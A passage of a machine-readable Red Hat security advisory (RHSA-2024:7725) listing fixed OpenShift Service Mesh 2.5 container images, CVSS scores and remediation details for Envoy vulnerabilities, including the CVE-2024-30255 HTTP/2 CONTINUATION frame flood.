"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 5.4, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode", }, { acknowledgments: [ { names: [ "Bartek Nowotarski", ], organization: "nowotarski.info", }, ], cve: "CVE-2024-30255", cwe: { id: "CWE-390", name: "Detection of Error Condition Without Action", }, discovery_date: "2024-04-02T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2272986", }, ], notes: [ { category: "description", text: "A vulnerability was found in how Envoy Proxy implements the HTTP/2 codec. There are insufficient limitations placed on the amount of CONTINUATION frames that can be sent within a single stream. This issue could allow an unauthenticated remote attacker to send packets to vulnerable servers, which could use up compute resources to cause a Denial of Service.", title: "Vulnerability description", }, { category: "summary", text: "envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood", title: "Vulnerability summary", }, { category: "other", text: "Red Hat rates the security impact of this vulnerability as Moderate, in alignment with upstream Envoy. The worst case scenario is excessive CPU utilization causing a denial of service. Once an attack has ended, the system should return to normal operations on its own.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-30255", }, { category: "external", summary: "RHBZ#2272986", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2272986", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-30255", url: "https://www.cve.org/CVERecord?id=CVE-2024-30255", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-30255", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-30255", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-j654-3ccm-vfmm", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-j654-3ccm-vfmm", }, { category: "external", summary: "https://nowotarski.info/http2-continuation-flood/", url: "https://nowotarski.info/http2-continuation-flood/", }, { category: "external", summary: "https://www.kb.cert.org/vuls/id/421644", url: "https://www.kb.cert.org/vuls/id/421644", }, ], release_date: "2024-04-03T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", 